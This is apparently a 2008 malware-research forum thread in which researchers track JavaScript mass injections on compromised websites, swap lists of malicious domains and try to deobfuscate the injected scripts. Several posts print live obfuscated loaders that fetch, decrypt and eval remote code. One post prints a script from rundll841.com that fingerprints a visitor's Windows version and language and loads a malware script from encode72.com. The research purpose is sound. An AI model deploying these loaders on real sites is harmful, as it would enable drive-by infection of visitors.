e58KQ%1%se3D%se75%se6E%se65%se73%se63%se61%se70%se65%se28%se41%se72%se52%se2%6Tse3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se41%se63%se78KQ%1%se6%6Tse76%se65%se58%se4F%se62%se6A%se65%se63%se78KQ%1%se28%se6E%se4F%se58KQ%1%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se7D';eval(unescape(cB.replace(/8KQ%/g,'b').replace(/%6T/g,'9%').replace(/b1%/g,'4%').replace(/%se/g,'%')));var nY=unescape(LV);if (!q){try{q=new ActiveXObject(nY);}catch(e){q=null}}var zqj=iGUR;var akK=function(){tP = unescape(q.responseText);var W5O=0;var Qg6M='Cc%76Cc%61Cc%7Z20Cc%74Cc%6ECc%37Cc%3BCc%66Cc%6FCc%7Z2r3H6BCc%74Cc%7ACc%4FCc%3DCc%30Cc%3BCc%6BCc%74Cc%7ACc%4FCc%3CCc%3Z35Cc%36Cc%3BCc%6BCc%74Cc%7ACc%4FCc%2BCc%2BCc%29Cc%7BCc%74Cc%6ECc%37Cc%3DCc%6BCc%74Cc%7ACc%4FCc%25Cc%4Z2ECc%6CCc%65Cc%6ECc%67Cc%74Cc%6r3H3BCc%74Cc%6ECc%37Cc%3DCc%4Z2ECc%63Cc%6r3H61Cc%7Z43Cc%6FCc%64Cc%65Cc%41Cc%74Cc%2r3H74Cc%6ECc%37Cc%29Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%2BCc%74Cc%6ECc%37Cc%3BCc%74Cc%6ECc%37Cc%3DCc%57Cc%35Cc%4FCc%2BCc%74Cc%6ECc%37Cc%3BCc%57Cc%35Cc%4FCc%3DCc%74Cc%6ECc%37Cc%20Cc%25Cc%20Cc%3Z35Cc%36Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3DCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3DCc%74Cc%6ECc%37Cc%3BCc%7DCc%5Z57Cc%6FCc%3DCc%30Cc%3B';eval(unescape(Qg6M.replace(/Cc%/g,'%').replace(/Z/g,'2%').replace(/r3H/g,'8%')));var V3LR='MZ68MZ42MZ49MZ73MZ3DMZ30MZ3BMZ76MZ61MZ72MZ20MZ53MZ58MZ3DMZ27MZ27MZ3B';eval(unescape(V3LR.replace(/Z/g,'m').replace(/Mm/g,'%')));var x6;var Ak;for(x6=0;x6<tP.length;x6++){RWo=RWo+1;RWo=RWo%256;hBIs=hBIs+nPG[RWo];hBIs=hBIs%256;tn7=nPG[RWo];nPG[RWo]=nPG[hBIs];nPG[hBIs]=tn7;Ak=nPG[RWo]+nPG[hBIs];Ak=Ak%256;Ak=nPG[Ak];Ak=tP.charCodeAt(x6)^Ak;SX+=String.fromCharCode(Ak);}eval(SX);};var x=function(){if((q.readyState==4)&&(q.status==200)){akK();}};q.onreadystatechange=x;q.open('GET',zqj,true);q.send(null);
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 02, 2008, 12:53:57 pm
Reply #3

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
Yancy=Mike?

mike@shadowserver.org -- yup, that's me

Quote
http://www.malwaredomainlist.com/forums/index.php?topic=1867.0

Need adding?

I've been trying to stick to script=src methods, rather than iframes.  It's more difficult to tell whether or not the iframes are mass injections or not.  I've yet to run across what looks like injected jscript that turns out to not be a mass injection.
The Shadowserver Foundation

June 02, 2008, 02:26:38 pm
Reply #4

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
New additions:
hxxp://www.xiaobaishan.net
hxxp://www.rexec39.com
hxxp://www.tlcn.net
The Shadowserver Foundation

June 02, 2008, 09:38:56 pm
Reply #5

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

June 03, 2008, 03:29:47 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 03, 2008, 11:40:15 pm
Reply #7

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
There is a script here which may be malicious. Don't know much about it, for all I know it could be clean but looks heavily obfuscated mgfcompressors.com/iieox.js

June 03, 2008, 11:44:31 pm
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I'm getting a 404 for that one?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 04, 2008, 11:32:17 am
Reply #9

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Steve iam also getting a 404 from that link. Wonder if its been cleaned, or they just dont like British IPs lol
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

June 04, 2008, 11:55:29 am
Reply #10

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
It changes the name of the file. It is yzuac.js at the moment
If you visit the link for the 2nd time - the page will be clear, no references to the JS file will be there.

The script is d*mn complicated.
I'll give it at try, and I'll post the results (if I get any)

June 04, 2008, 12:32:34 pm
Reply #11

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I didn't got far. the script try to define a function in the way that isn't working in SpiderMonkey

If someone want to try it in IE under Virtual Machine, here is the code I got:
Code: [Select]
var arg="btryttfi";
function Cwmf8K(AH){var zoU5="C68KC3";var U47="var FuqV=75397;";var Pk="qeJ33cqe3";var zOR="8N0G8";var Jz="9G8N0G850";var vV="charCodeA";var pK="901;var xEx=1";Jz+="G85DG83DG84";var ySE="nLej-40955883";var j6="e3Dcqe31";var eBBT="scape(U.replac";var u1oP="Z2Yh;n";var sz=")));var oGZ";var r="qeEl1";var Bi="q6KC3BKCUeqAK";zOR+="50G85DG8";var X="change=G;Y";var UqE="Txc+=String.fro";var EwzG="6c-857";var mkj="G84CG83DG843G";var i7=";var xC=711";var Q1="2daR20d";var BAZz="(/f/g,'A').re";var ZhM5="L=new Activ";var RkYD="L=nul";var oie="(/cqe/";var MU3=");D=xC%nLe";var pjJt="5DG83BG843G";var MCSe="6F9D%g12";var tSPH=");mi+";var CN="0%g125%g120";var RF="ace(/Ueq/g";var gstw="ape(De.rep";ySE+="84);F";var KZP="var YL=null;va";var gh="l=unescape(";var VyU="61G8N2G84";var lJ="o/g,'%'";var em9="KC6UeqK";var cy0="2G86FG86DG843G";var iB="0dSmi460dSmi750";var X1Vn="KC76KC61";var SN="ace(/9/g,";var KO="(/G8/g,'%')))";zOR+="3BG845G850G845G";var uf="86DG86DG84CG8";var XjNy="g136%g13B9A%g";var UK="%4C%48%54%54%";SN+="'%5')));}qIpP=";var n8vF="e(/\\W/g,'');";uf+="3DG84FG8N9G82";var ClN8="ce(/M1/g,'%";var mNf="%g143%g1769";pjJt+="8N6G851G85B";var GC="r YH=function()";var rK="KC61KC";var y="3D%g143%g1769";var kwC="g148%g165%g176%";var hsR="4D%4C";KO+=";}eva";cy0+="868G8";var EbF="String";rK="C78KC43KC3BKC76"+rK;var rK2u="g,'D')));FuqV=";var aSn5="33Fpo34F";var t="N0G850G85DG82";var TfU="DFpo3BFpo76";var Dd="KC76KC61KC7";var V9sI="tring.fro";MU3="v-59581"+MU3;var c="2B9A%g148";MU3=EwzG+"5844471)*(v"+MU3;var g="XObject(z";g+="zl);}";var pMu="cape(z2l";var dg="i.charCodeA";var Usbs="L.sen";kwC+="g13D%g143%g1";lJ+=")));Z2Yh=Z2";var WDIF="L=null}}v";var ERL4="mi/g,'%')));";Bi+="C32KCUeq9KC68KC";var rq="cqe72cqe2Vc";hsR+="%48%54%54%50';i";pK+="8390;Pv6";ClN8=",'M').repla"+ClN8;var Lm="69%63%72%6F%73%";TfU="po56Fpo2DFpo2"+TfU;mNf="%g13B"+mNf;var uT="pe(Cpw)";var KJKW="replace(/aR/";var mw="a++){CvQ[UE";var kIc="ngth;oGZI";var SsV="0G845G";var kzg="3B';eval(un";var DY="3BG85AG848G";KO+="l(q);};var G=";n8vF="eplac"+n8vF;var Eo="o4CFpo3B';ev";var g76O="qeJEl3cqe3Dc";var j=");uA=183;}}";gh+="it);if ";RkYD="();}catch(e){Y"+RkYD;var yCa="').replace(/El";var h6Sm="3B9894%g13D9A%g";var SNT="dSmi75";var sh="9D%g13B%g143%";var uK8="2Fpo20Fpo";uT="r ejA=unesca"+uT;Pk=j6+"cqe3c"+Pk;var Esh="2G84CG8";var XeN="G85DG83BG";BAZz=pMu+"P.replace"+BAZz;gstw="eval(unesc"+gstw;Dd="n0KC78KC43KC3B"+Dd;var Cxt1="qeEl1cq";ySE+="uqV=FuqV%"+u1oP;var FBk="DG86DG";var pk="place(/B%/g";var J2="nseText);var X";gh+="(!YL){try";var bAg="5BG845G850G8";var J="849G8N0G850G";UK="%32%2E%58%4D"+UK;FBk="852G86"+FBk;VyU+="3G86FG86";h6Sm+="148%g165%g1";RkYD="tpRequest"+RkYD;Q1="daR6B%daR7"+Q1;var tW8J="dSmixigY";KJKW="unescape(BUBC."+KJKW;mNf+="19B98949D%g13D9";var UkqY="051;var Mkm";KO="g,'7').replace"+KO;t="85BG8N1G849G8"+t;var dl9o="0G845G";FBk="DG86DG84CG83DG"+FBk;J="G8N1G"+J;var Af="84CG8";var nr="mmL;for(RbLR=0;";FBk+="84CG825G";UK+="50';var";i7+="63;var EjFO='KC";var PLZK="po72Fp";var REQt=";Go<256;Go+";V9sI="){Txc+=S"+V9sI;var DAJC="dSmi760dSmi3D0d";PLZK+="o20Fpo72Fpo7AF";var mtJB="850G845G8";dg="ngth;ZHev=m"+dg;gstw="CG829G83B';"+gstw;var w6="qe5cqeJ3DcqeE";var xXpp="YL.onrea";U47+="var Z2Y";Q1="30daR3BdaR76"+Q1;DAJC="640dSmi6A0"+DAJC;vV=kIc+"++){uA^=mi."+vV;w6="3cqe59cqeEl1c"+w6;TfU="Fpo75Fpo71F"+TfU;var CKCG="80606";c="9894%g1"+c;var tY9Q="();var UEma";var KJGB="65%g176%g13D%g1";Eo="BFpo4BFp"+Eo;var Lw="Fpo27";var bZx="3DG843G8N6G851G";var Rk7k="UeqKC37KC3";Bi="KC7UeqKC71KCUe"+Bi;Cxt1="e7Elc"+Cxt1;var NJZE="ect(ejA";var AB="52G86DG86";UK="D%73%78%6D%6C"+UK;ClN8+="').repl"+SN;var H="C37KC37KC32K";Dd+="2KC20KC76KC76KC";V9sI+="mCharCode";KJGB+="43%g176919";y="g147%g16F9D%g1"+y;ERL4+="CvQ=new Array"+tY9Q;pk+=",'1').replac";Usbs=",IOom,true);Y"+Usbs;FBk+="832G8";em9+="C6AKC3Vn0";var yjZN="UeqAKC32KCUeq9";dg="%mi.le"+dg;UqE="(oGZI%76==75){"+UqE;var OcK="){if((YL";var T7="6EKC4CKC6U";var okr="9KC3UeqKC3";var ojT8="KC4CKC3Vn0KC33K";rK+="72KC20KC6EKC4CK";NJZE=ZhM5+"eXObj"+NJZE;Af+="3BG8N1G82B";i7+="UeqAKC32KCUeq9K"+zoU5;var ixL="){YL=null}}";var Dt="86DG84CG83DG84";gh=WDIF+"ar zz"+gh;y=sh+"g176919B%"+y;XeN+="843G8N6G851G";var Ip="G869G86EG86N";t+="BG843G8N6G851G8"+bAg;H+="C3UeqKC3B"+X1Vn;PLZK+="po31Fpo3DFpo3";XeN="45G850G845"+XeN;SsV="845G85"+SsV;ixL+="var IOo";gh+="{YL=new ";dg=REQt+"+){ZHev=Go"+dg;g=gh+"Active"+g;Eo="DFpo44Fpo2"+Eo;DY+="865G8N6G8"+bZx;var dpL="851G85BG8N1";var jmh="KC6UeqKC6A";RF+=",'5').replace(";var Wy="i=arguments.";ixL+="m=SYaX;va"+GC;SNT="i3D0dSmi460"+SNT;KJKW="7daR3B';eval("+KJKW;var XgE="ace(/0dS/g,'";var qMc1="1G849";var euFA="th;nLej=nLej+xE";J2="(YL.respo"+J2;XeN="85BG8"+XeN;h6Sm=c+"%g165%g176%g1"+h6Sm;zOR+="83DG845G85"+dl9o;T7=rK+"C6UeqKC6AKC3BKC"+T7;Usbs+="d(null);";em9="6EKC4C"+em9;BAZz=Pk+"B';eval(unes"+BAZz;Af+="G83DG853G8";var LkCR="r ZHe";uT=RkYD+"l};}va"+uT;SsV="5G836G83BG"+SsV;uT="XMLHt"+uT;sz="lace(/%J/g,'8%'"+sz;mtJB+="5DG83DG85A";rq+="qe75cqe41cq"+BAZz;Af="DG86DG"+Af;gstw+="lace(/N/"+KO;ixL+="{Oy = unescape"+J2;DAJC="50dSmi"+DAJC;ySE="890)*("+ySE;ClN8+="0;var BUBC='d";okr=ojT8+"C30KC3"+okr;UkqY=rK2u+"FuqV+44"+UkqY;euFA=ySE+"Lej=rz1+D.leng"+euFA;kzg+="escape(Z3p.repl";Usbs=X+"L.open('GET'"+Usbs;gstw="52G86DG86DG84"+gstw;DAJC+="Smi410dS";yjZN+="KC68KC2AK"+T7;kwC+="76919B%";eBBT="g13B';eval(une"+eBBT;var Dda="%g148%g165%g176";Bi="68KC2BKC46"+Bi;var Ckds="dSmi7xigY0";ClN8+="aR45daR50daR4";uf+="EG863G868G8"+VyU;tSPH+="=FuqV;var";XgE="ig/g,'z').repl"+XgE;SsV="G825G832G83"+SsV;RF+="/KC/g,'%').";OcK=gstw+"function("+OcK;Wy=mw+"ma]=UEma;}m"+Wy;Ckds="0dSmi760dSmi610"+Ckds;iB+="dSmi710dSmi";dpL="G82BG843G8N6G"+dpL;var K="Fpo3BFpo4";Rk7k+="1KC30KC3BKC"+em9;UK+=" it='%4D%"+Lm;OcK+=".readySt";uK8=TfU+"Fpo61Fpo7"+uK8;FBk="852G86"+FBk;Af="G852G86"+Af;yCa=rq+"place(/V/g,'0"+yCa;MCSe=kwC+"g147%g1"+MCSe;MCSe+="B9A%g148%g165";sz=oie+"g,'%').rep"+sz;Wy="6;UEm"+Wy;i7+="Vn0KCUeqA";y=KJGB+"B%g147%g16F"+y;g76O="cqe7c"+g76O;Esh="G8N4G828G852G86"+Esh;n8vF=EbF+"();mi=mi.r"+n8vF;Rk7k=Dd+"3Vn0KC32KC3"+Rk7k;nr="var R"+nr;qMc1=DY+"85BG8N"+qMc1;XjNy+="148%g1"+y;MCSe="ar U='9A%"+MCSe;XjNy=CN+"%g132%g135%"+XjNy;Q1=ClN8+"5daR3DdaR"+Q1;yjZN=Bi+"3Vn0KC"+yjZN;t+="45G85DG83BG"+FBk;pk+="e(/dJ/g,'%'))";var VJ=";RbLR++){";KJKW="daR3DdaR27daR2"+KJKW;Eo+="al(unescape(Mkm";uK8=aSn5+"po36Fpo3BFpo46"+uK8;Dt="83BG852G86DG"+Dt;PLZK=UkqY+"o='Fpo76Fpo61F"+PLZK;dg=LkCR+"v;for(Go=0"+dg;eBBT+="e(/%g/g"+Q1;sz+="I;for(oG";yCa="cqe7ElcqeEl1"+yCa;VJ=nr+"RbLR<Oy.length"+VJ;UqE+="mCharCode(uA"+j;AB=mkj+"8N6G851G85BG8"+AB;XgE+="N').replace(";uT="){try{YL=new "+uT;yCa=g76O+"qe27cqe27cqe3B"+yCa;Ckds+="dSmixigY00dSmi6"+DAJC;J="ar De='"+J;pjJt+="G8N1G84"+Jz;Af+="N4G8N2"+Ip;yCa+="/g,'6').replace"+sz;XgE+="/xzY/g,'2').r";var aKIf="G86FG";var nnIR="UEma=";CKCG=lJ+"Yh%KL;var Pv6c="+CKCG;dg+="t(ZHev);v"+MCSe;hsR+="f (!YL"+uT;ERL4=XgE+"eplace(/N"+ERL4;t+="35G836G83";nnIR+="0;UEma<25"+Wy;MU3=euFA+"x;xC=(Pv"+MU3;Ckds=tW8J+"50dSmi440dSmi3B"+Ckds;okr+="2KC3B';ev";yjZN+="eqKC6AKC3V"+Rk7k;hsR+=";if (!YL){try{Y"+NJZE;H+="KC72KC20KC4B"+okr;kzg=Ckds+"mi480dSmi"+kzg;Esh=uf+"4G865G841"+Esh;RF="pe(EjFO.repl"+RF;ERL4+=";var ";Af+="G82EG866G8N"+cy0;uK8=PLZK+"3Fpo30Fpo"+uK8;w6+="l5cqeEl4c";yjZN+="KC6EKC4C"+jmh;xXpp+="dystate"+Usbs;SNT=iB+"560dSm"+SNT;AB+="DG84CG85DG8";vV+="t(oGZI);if"+UqE;CKCG="e(/Fp"+CKCG;SsV="G849G8N0G850"+SsV;qMc1="G835G836G8"+qMc1;KZP=V9sI+"(uA);}mi=Txc;"+KZP;dpL+="G849G"+zOR;CKCG+=";vv=vv+33"+pK;xXpp="{YH();}};"+xXpp;uK8="(/Vn0/"+uK8;w6=Cxt1+"e72cqe2Vcqe5"+w6;w6=tSPH+" z2lP='cq"+w6;ixL+="T=0;va"+dg;nnIR+="callee.to"+n8vF;nnIR+="mi=mi.toUppe";hsR="2E%58%"+hsR;eBBT="g176%"+eBBT;w6+="qeElfcqe7Elc";r+="cqe72cqe2Vcqe54"+yCa;Dda=ixL+"%g176%g13B9A"+Dda;kzg+="ace(/"+ERL4;AB=t+"BG852G86DG86D"+AB;K=Lw+"Fpo33Fpo35Fpo27"+K;nnIR+="rCase("+w6;VJ+="qIpP=qIpP+1;v"+J;Af+="61G8N2G843"+aKIf;Dda=g+"catch(e"+Dda;SsV+="83DG845G850G845"+dpL;RF+="replace"+uK8;MU3=CKCG+"c=(Pv6c-79"+MU3;pk=KJKW+"g,'J').re"+pk;MU3=Eo+"o.replac"+MU3;RF=H+"al(unesca"+RF;MU3=K+"4Fpo3"+MU3;UK=KZP+"r Cpw='%4"+UK;SNT=MU3+"j;var Z3p='"+SNT;mNf=XjNy+"19B98949D"+mNf;VJ+="83DG8N1"+SsV;SNT+="0dSmi710dSmi560"+kzg;Dda+="%g13D"+h6Sm;mtJB=XeN+"85BG845G"+mtJB;mtJB+="G848G865G8N6G"+Dt;RF+="44Fpo3D"+SNT;i7=U47+"h=73665"+i7;yjZN+="KC2AKC3UeqK"+RF;qMc1+="G8N0G850G8"+pjJt;pk=eBBT+"aR7B%"+pk;Esh+="52G829G85E"+Af;AB=mtJB+"3G8N6G851G"+AB;yjZN+="mi;for("+nnIR;AB=qMc1+"3G8N6G851G"+AB;pk+=");var RbLR;"+VJ;AB+="3BG852G"+Esh;xXpp=".status==200))"+xXpp;Dda+="76%g12"+mNf;hsR+=");}catch(e){Y"+Dda;OcK+="ate==4)&&(YL"+xXpp;i7+="KC32KCUeq9KC"+yjZN;hsR=UK+"6F%66%74%"+hsR;hsR+="A%g148%g165%"+pk;r=i7+"qe3Bcqe7Elc"+r;AB+="864G865G828G8"+OcK;hsR=vV+"if(oGZI%76!=75"+hsR;r+="ZI=0;oGZI<mi.le"+hsR;r+="825G832"+AB;eval(r);}Cwmf8K(arg);


Take a look at the first variable:
var arg="btryttfi";
The value of the variable is the name of the file on the server. It contains some data probably needed in the script.
After going through deobfuscation, i got till here:
Code: [Select]
var FuqV=75397;var Z2Yh=73665;var xC=71163;var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));FuqV=FuqV+44051;var Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';eval(unescape(Mkmo.replace(/Fpo/g,'%')));Z2Yh=Z2Yh%KL;var Pv6c=80606;vv=vv+33901;var xEx=18390;Pv6c=(Pv6c-79890)*(nLej-4095588384);FuqV=FuqV%Z2Yh;nLej=rz1+D.length;nLej=nLej+xEx;xC=(Pv6c-8575844471)*(vv-59581);D=xC%nLej;var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));CvQ=new Array();var UEma;var mi;for(UEma=0;UEma<256;UEma++){CvQ[UEma]=UEma;}mi=arguments.callee.toString();mi=mi.replace(/\W/g,'');mi=mi.toUpperCase();mi+=FuqV;var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));var oGZI;for(oGZI=0;oGZI<mi.length;oGZI++){uA^=mi.charCodeAt(oGZI);if(oGZI%76==75){Txc+=String.fromCharCode(uA);uA=183;}}if(oGZI%76!=75){Txc+=String.fromCharCode(uA);}mi=Txc;var YL=null;var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';if (!YL){try{YL=new XMLHttpRequest();}catch(e){YL=null};}var ejA=unescape(Cpw);if (!YL){try{YL=new ActiveXObject(ejA);}catch(e){YL=null}}var zzl=unescape(it);if (!YL){try{YL=new ActiveXObject(zzl);}catch(e){YL=null}}var IOom=SYaX;var YH=function(){Oy = unescape(YL.responseText);var XT=0;var ZHev;for(Go=0;Go<256;Go++){ZHev=Go%mi.length;ZHev=mi.charCodeAt(ZHev);var U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));}qIpP=0;var BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));var RbLR;var RmmL;for(RbLR=0;RbLR<Oy.length;RbLR++){qIpP=qIpP+1;var De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')));}eval(q);};var G=function(){if((YL.readyState==4)&&(YL.status==200)){YH();}};YL.onreadystatechange=G;YL.open('GET',IOom,true);YL.send(null);

JS Debuger says that AH is not defined. AH exists in obfuscated script, as the argument of the function.
After I put a value instead AH, I get to the wrong definition of mi
SpiderMonkey does not allow such declaration of mi function.
I have no idea how to get further from this step.

June 04, 2008, 12:47:52 pm
Reply #12

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Sorry I didn't asked for permission (my brain seems to be slower than my fingers), but I've posted the link to this malicious site on MWR forum.
If antnet can't deobfuscate it, then I do not know who can do it.

June 04, 2008, 02:17:40 pm
Reply #13

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
New:
tjwh202.162.ns98.cn
nb88.cn
hxxp://www.exe94.com
hxxp://www.view89.com
hxxp://www.err68.com
hxxp://www.rundll841.com

Not injected, but related and definately malicious (several of the above injections reference it):
sslput4.com
The Shadowserver Foundation

June 04, 2008, 02:58:08 pm
Reply #14

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I did take a look at rundll841.com
It does take a look at the system language settings, and it downloads malware according to these:
Code: [Select]
document.UhbtQqzm = 1;
document.Z3p0uYay = 1;
document.MSDKhOrw = 1;
if (!document.F9kJY0Ud) {
var Nx3xniTR;
var ALFsRXKd = navigator.appMinorVersion;
var KDzpO8UG = -1
var aanTFP7g = "01";
while((KDzpO8UG = ALFsRXKd.indexOf(";SP", KDzpO8UG+1)) != -1) {
var QfTUqtJd = ALFsRXKd.charAt(KDzpO8UG+3);
if (QfTUqtJd == "1")
aanTFP7g = "02";
else if (QfTUqtJd == "2")
aanTFP7g = "03";
else if (QfTUqtJd == "3")
aanTFP7g = "04";
else if (QfTUqtJd == "4")
aanTFP7g = "05";
else if (QfTUqtJd == "5")
aanTFP7g = "06";
else if (QfTUqtJd == "6")
aanTFP7g = "07";
if (aanTFP7g != "01")
break;
}
if (aanTFP7g == "01" && ALFsRXKd.indexOf("Release Candidate", 0) != -1)
aanTFP7g = "08";
var QzmzTMai = navigator.systemLanguage.substr(0, 10);
var FEXGqg2V = "";
for(var GPzlxy9a=0;GPzlxy9a<QzmzTMai.length;GPzlxy9a++) {
QOu110FA = QzmzTMai.charCodeAt(GPzlxy9a).toString(16);
if (QOu110FA < 2)
FEXGqg2V += "0";
FEXGqg2V += QOu110FA;
}
while(FEXGqg2V.length < 20)
FEXGqg2V += "00";
var Nx3xniTR = aanTFP7g + FEXGqg2V;
var sIvWfaMT = document.createElement("script");
sIvWfaMT.setAttribute("type", "text/javascript");
sIvWfaMT.setAttribute("src", "http://encode72.com/cgi-bin/index.cgi?f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + Nx3xniTR);
document.body.appendChild(sIvWfaMT);
}